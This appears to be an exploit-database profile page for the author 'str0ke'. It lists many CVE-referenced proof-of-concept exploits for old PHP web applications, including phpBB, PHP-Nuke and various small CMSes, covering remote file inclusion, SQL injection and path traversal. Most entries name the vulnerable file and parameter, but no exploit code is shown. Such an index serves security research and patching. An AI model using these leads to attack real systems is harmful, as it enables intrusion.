str0ke

106 exploits Active since May 1997
CVE-2006-4121 EXPLOITDB text WRITEUP
See-Commerce 1.0.625 - Remote File Inclusion via owimg.php3 path Parameter
PHP remote file inclusion vulnerability in owimg.php3 in See-Commerce 1.0.625 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the path parameter.
CVE-2005-3363 EXPLOITDB perl WORKING POC
Saphp Lesson - SQL Injection via ForumID Parameter
SQL injection vulnerability in Saphp Lesson, possibly saphp Lesson1.1 and saphpLesson2.0, allows remote attackers to execute arbitrary SQL commands via the forumid parameter in (1) showcat.php and (2) add.php.
CVE-2006-0943 EXPLOITDB perl WORKING POC
PwsPHP 1.2.3 - SQL Injection via Sondages Module id Parameter
SQL injection vulnerability in the sondages module in index.php in PwsPHP 1.2.3 allows remote attackers to execute arbitrary SQL commands via the id parameter to index.php.
CVE-2006-0973 EXPLOITDB perl WORKING POC
phpWebSite <= 0.10.2 - SQL Injection via Topic Parameter
SQL injection vulnerability in topics.php in Appalachian State University phpWebSite 0.10.2 and earlier allows remote attackers to execute arbitrary SQL commands via the topic parameter.
CVE-2008-2216 EXPLOITDB text WORKING POC
Project-Based Calendaring System 0.7.1 - Authenticated Arbitrary File Upload via yopy_upload.php
Unrestricted file upload vulnerability in src/yopy_upload.php in Project-Based Calendaring System (PBCS) 0.7.1 allows remote authenticated users to upload arbitrary files to tmp/uploads.
CVE-2006-4749 EXPLOITDB text WORKING POC
PHP Advanced Transfer Manager <1.20 - RCE
Multiple PHP remote file inclusion vulnerabilities in PHP Advanced Transfer Manager (phpATM) 1.20 allow remote attackers to execute arbitrary PHP code via the include_location parameter in (1) activate.php, (2) configure.php, (3) fileop.php, (4) getimg.php, (5) ipblocked.php, (6) register.php, (7) showrecent.php, (8) showtophits.php, (9) usrmanag.php, (10) viewer_bottom.php, (11) viewer_content.php, and (12) viewer_top.php. NOTE: The login.php and confirm.php vectors are already covered by CVE-2006-4594.
CVE-2005-0841 EXPLOITDB text WORKING POC
phpMyFamily 1.4.0 - SQL Injection via Multiple Parameters
SQL injection vulnerability in (1) people.php, (2) track.php, (3) edit.php, (4) document.php, (5) census.php, (6) passthru.php and possibly other php files in phpMyFamily 1.4.0 allows remote attackers to execute arbitrary SQL commands, as demonstrated via (1) the person parameter to people.php or (2) the Login field.
CVE-2008-1776 EXPLOITDB text WORKING POC
phpblock A8.4 - Remote Code Execution via PATH_TO_CODE Parameter
PHP remote file inclusion vulnerability in modules/basicfog/basicfogfactory.class.php in PhpBlock A8.4 allows remote attackers to execute arbitrary PHP code via a URL in the PATH_TO_CODE parameter.
EIP-2026-110955 EXPLOITDB perl WORKING POC
phpBB 2.0.19 - 'user_sig_bbcode_uid' Remote Code Execution
EIP-2026-110950 EXPLOITDB text WORKING POC
phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure
CVE-2005-2086 EXPLOITDB WORKING POC
phpBB <= 2.0.15 - Remote File Inclusion in viewtopic.php
PHP remote file inclusion vulnerability in viewtopic.php in phpBB 2.0.15 and earlier allows remote attackers to execute arbitrary PHP code.
CVE-2005-0614 EXPLOITDB c++ WORKING POC
phpBB 2.0.12 - Privilege Escalation
sessions.php in phpBB 2.0.12 and earlier allows remote attackers to gain administrator privileges via the autologinid value in a cookie.
CVE-2007-1907 EXPLOITDB text WORKING POC
Pathos Content Management System 0.92-2 - Remote File Inclusion via warn.php file Parameter
PHP remote file inclusion vulnerability in warn.php in Pathos Content Management System (CMS) 0.92-2 allows remote attackers to execute arbitrary PHP code via a URL in the file parameter.
CVE-2005-0999 EXPLOITDB bash WORKING POC
PHP-Nuke 6.x-7.6 - SQL Injection via Top Module querylang Parameter
SQL injection vulnerability in the Top module for PHP-Nuke 6.x through 7.6 allows remote attackers to execute arbitrary SQL commands via the querylang parameter.
CVE-2006-4103 EXPLOITDB text WORKING POC
PHP <1.3 - Remote Code Execution
PHP remote file inclusion vulnerability in article-raw.php in Jason Alexander phNNTP 1.3 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the file_newsportal parameter.
CVE-2007-5157 EXPLOITDB text WRITEUP
PHP Fidonet Tosser 1.3.0 - Remote Code Execution via SRC_PATH Parameter
PHP remote file inclusion vulnerability in phfito-post.php in Alex Kocharin PHP Fidonet Tosser (PhFiTo) 1.3.0 in phpFidoNode allows remote attackers to execute arbitrary PHP code via a URL in the SRC_PATH parameter to phfito-post.
CVE-2007-5016 EXPLOITDB perl WORKING POC
OneCMS 2.4 - SQL Injection via userreviews.php abc Parameter
SQL injection vulnerability in userreviews.php in OneCMS 2.4 allows remote attackers to execute arbitrary SQL commands via the abc parameter.
CVE-2006-6869 EXPLOITDB php WORKING POC
MAXdev MDForum <2.0.1 - Path Traversal
Directory traversal vulnerability in includes/search/search_mdforum.php in MAXdev MDForum 2.0.1 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang cookie to error.php, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
CVE-2005-0414 EXPLOITDB text WORKING POC
MercuryBoard 1.1.1 - SQL Injection via Reply Post t or qu Parameter
SQL injection vulnerability in post.php for MercuryBoard 1.1.1 allows remote attackers to execute arbitrary SQL commands via a reply post action for index.php with (1) the t parameter or (2) the qu parameter.
CVE-2007-1837 EXPLOITDB text WORKING POC
MangoBery CMS 0.5.5 - Remote File Inclusion via Site_Path Parameter
Multiple PHP remote file inclusion vulnerabilities in MangoBery CMS 0.5.5 allow remote attackers to execute arbitrary PHP code via a URL in the Site_Path parameter to (1) boxes/quotes.php or (2) templates/mangobery/footer.sample.php.
CVE-2008-1635 EXPLOITDB text WORKING POC
Keep It Simple Guest Book <5.1.1 - Path Traversal
Directory traversal vulnerability in view_private.php in Keep It Simple Guest Book (KISGB) 5.0.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the tmp_theme parameter. NOTE: 5.1.1 is also reportedly affected.
CVE-2006-1662 EXPLOITDB perl WORKING POC
Limbo CMS 1.0.4.1-1.0.4.2 - Remote Code Execution via Itemid Parameter
The frontpage option in Limbo CMS 1.0.4.2 and 1.0.4.1 allows remote attackers to execute arbitrary PHP commands via the Itemid parameter in index.php.
CVE-2007-0337 EXPLOITDB php WORKING POC
KGB < 1.9 - Directory Traversal and Arbitrary File Execution via skinnn Parameter
Directory traversal vulnerability in sesskglogadmin.php in KGB 1.9 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the skinnn parameter, as demonstrated by invoking kg.php with a postek parameter containing PHP code, which is injected into a file in the kg directory, and then included by sesskglogadmin.php.
CVE-2008-1609 EXPLOITDB text WORKING POC
jaf_cms 4.0 RC2 - Remote Code Execution via URL Parameter Injection
Multiple PHP remote file inclusion vulnerabilities in just another flat file (JAF) CMS 4.0 RC2 allow remote attackers to execute arbitrary PHP code via a URL in the (1) website parameter to (a) forum.php, (b) headlines.php, and (c) main.php in forum/, and (2) main_dir parameter to forum/forum.php. NOTE: other main_dir vectors are already covered by CVE-2006-7127.
EIP-2026-107926 EXPLOITDB php WORKING POC
Invision Power Board 1.3.1 - 'login.php' SQL Injection